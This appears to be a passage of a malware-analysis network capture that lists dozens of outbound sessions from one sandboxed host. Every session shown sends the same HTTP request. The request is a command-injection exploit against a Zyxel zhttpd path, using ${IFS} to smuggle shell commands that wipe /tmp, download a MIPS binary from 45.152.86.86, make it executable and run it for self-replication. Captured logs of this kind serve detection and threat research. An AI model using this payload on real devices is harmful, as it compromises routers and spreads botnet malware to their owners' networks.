                                        Mar 31, 2024 09:21:29.969881058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5140192.168.2.235905267.103.190.128443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:29.969921112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5141192.168.2.235916458.249.41.10443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:29.970057964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5142192.168.2.2340728116.216.10.40443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:29.970092058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5143192.168.2.2344436191.236.91.244443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:29.970149994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5144192.168.2.234479679.178.145.219443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:30.000207901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5145192.168.2.2359488179.133.176.131443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:30.000344992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5146192.168.2.233374260.163.53.92443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:30.000556946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5147192.168.2.234735291.96.140.24443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:30.000736952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5148192.168.2.235911081.32.130.94443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:30.000896931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5149192.168.2.2357128185.255.198.248443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:30.001614094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5150192.168.2.2341118181.168.198.53443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:31.010008097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5151192.168.2.233614276.202.77.61443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:31.010066032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5152192.168.2.235599649.45.83.121443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:31.010123014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5153192.168.2.233975876.81.208.21443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:31.010157108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5154192.168.2.233992625.87.198.53443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:31.010205030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5155192.168.2.234305253.36.170.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:31.010360956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5156192.168.2.2352752192.153.87.58443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:32.013930082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5157192.168.2.2351184137.196.129.99443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:32.013967991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5158192.168.2.234636413.47.74.133443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:32.014005899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5159192.168.2.233481613.150.237.48443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:32.014060020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5160192.168.2.2346354152.0.90.27443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:32.014112949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5161192.168.2.2337920120.195.122.226443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:32.014354944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5162192.168.2.234073027.207.131.93443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:32.014399052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5163192.168.2.2335828182.48.250.236443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:32.014446974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5164192.168.2.23603448.110.37.142443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:33.017509937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5165192.168.2.2341406189.35.235.4443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:33.017550945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5166192.168.2.2357646128.52.245.10443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:33.017608881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5167192.168.2.234540296.62.195.54443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.029305935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5168192.168.2.2356292193.227.235.44443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.029350042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5169192.168.2.2352910139.98.203.156443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.029393911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5170192.168.2.233415680.181.62.90443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.029442072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5171192.168.2.234689870.154.59.241443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.029500008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5172192.168.2.2335988153.47.167.208443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.029541016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5173192.168.2.2333156142.0.209.178443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.029592037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5174192.168.2.2333174114.93.244.38443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.029634953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5175192.168.2.2337428105.239.13.197443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.029685974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5176192.168.2.2338500115.181.187.171443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.029733896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5177192.168.2.2353718202.215.26.159443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.029788017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5178192.168.2.2349314205.217.76.64443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.029850006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5179192.168.2.23332801.165.48.233443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.029886961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5180192.168.2.233627051.62.20.244443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.029947042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5181192.168.2.2335746220.95.56.216443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.029989958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5182192.168.2.235776043.135.119.13443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.030045033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5183192.168.2.234725258.48.142.151443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.030097961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5184192.168.2.235483227.68.135.212443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.030141115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5185192.168.2.2334962200.27.171.125443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.030193090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5186192.168.2.2344482180.95.243.48443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.030235052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5187192.168.2.2338566148.51.160.231443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.030277967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5188192.168.2.23377882.244.144.92443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.030343056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5189192.168.2.235965293.81.154.64443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.030386925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5190192.168.2.235595458.87.163.93443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.030436993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5191192.168.2.235348813.105.14.228443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.030486107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5192192.168.2.235037458.228.71.105443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.030534983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5193192.168.2.2353170168.23.212.90443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.030599117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5194192.168.2.2340278182.66.88.247443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.030642033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5195192.168.2.236035095.132.143.167443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.030690908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5196192.168.2.235667499.124.237.14443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.030750990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5197192.168.2.234425840.37.235.190443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.030791044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5198192.168.2.2350052179.5.141.17443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.030838013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5199192.168.2.2344262161.25.74.173443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.030879021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5200192.168.2.233790081.18.233.172443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.030936956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5201192.168.2.2338236213.199.40.148443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.030967951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5202192.168.2.233282659.94.65.77443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.031021118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5203192.168.2.2342844170.82.226.59443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.031070948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5204192.168.2.2347024101.152.30.242443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.031116009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5205192.168.2.233830823.187.200.214443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.031148911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5206192.168.2.2352960136.248.125.59443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.031187057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5207192.168.2.2335460102.97.160.9443
                                        TimestampBytes transferredDirectionData
